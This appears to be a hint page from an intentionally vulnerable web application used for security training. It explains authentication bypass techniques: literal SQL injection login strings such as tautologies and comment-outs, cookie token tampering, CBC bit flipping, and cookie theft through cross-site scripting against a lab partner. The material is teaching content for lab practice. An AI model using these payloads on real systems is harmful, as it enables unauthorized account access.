Authentication Bypass


Overview

Authentication Bypass is generally custom for each web application which possesses the vulnerability. However, there are some common abuse case patterns.

Discovery Methodology

Attempt to discover if SQL injection is present as this vulnerability often allows authentication bypass.

If possible aquire a standard user account and an administrator account from the client. Authenticate with both carefully noting any differences in the session tokens, cookies, and/or hidden fields.

If the testing is black box, register for multiple user accounts carefully noting differences between the accounts after authentication.

Exploitation (SQL Injection)

Login

Use SQL Injection to bypass authentication on the login page. See the SQL Injection hints or the SQL injection tutorial for help on SQL injection.

This can be done using the name field to authenticate as the first user found in the user table.
Username: ' or 'a' = 'a' -- Password: whatever
To target a particular user, identify the user. (Note: This site is vulnerable to username disclosure.) Complete the "username" portion of the query with the target username then bypass the password portion of the query by creating a tautalogy or simply commenting out the password portion.

Bypass password with a tautalogy
Username: jeremy Password: ' or ('a' = 'a' and username='jeremy') or '
Comment out the password portion of the query
Username: jeremy' -- Password: whatever

Exploitation (Authentication Token Manipulation)

Alter the values of any authentication and/or authorization tokens found such as those in cookies. This will work on any page post-authentication. Register for an account to explore how the site uses cookies.

Gaining Access: Using insecure client-side authentication tokens

Page: Any page
Tool: Cookies Manager+ version 1.5.1 (verified with Firefox 4.0.1)

Note what cookies the site has by default
Create a test account
Login using test account
Check what cookies the site has after authentication
Differential Analysis: Change the value of the original auth cookie
Work backwards until admin account is found

Exploitation (CBC bit flipping attack)

Try bit flipping, oracle padding, and cbc bit flipping attacks on authentication and/or authorization tokens.

View User Privileges

Exploitation (Authentication Token Hijack)

Use a cross site script attack to trick a lab partner into visiting the data capture page while authenticated. Use Cookie Manager Plus to create or edit cookies in order to become that user.

Data Capture
View Captured Data

Exploitation (Browser Fingerprint Spoofing)

On captive portal systems, spoofing an unsupported browser may bypass some controls

User-Agent Impersonation

Videos


Click here to watch How to Create Wordlists from Web Sites using CEWL
Click here to watch Brute Force Authentication using Burp-Intruder
Click here to watch SQL Injection Explained - Part 8: Authentication Bypass
Click here to watch Bypass Authentication via Authentication Token Manipulation
Click here to watch Using Hydra to Brute Force Web Forms Based Authentication
Click here to watch Analyze Session Token Randomness using Burp-Suite Sequencer
Click here to watch Using Ettercap and SSLstrip to Capture Credentials
Click here to watch Introduction to Password Cracking with John the Ripper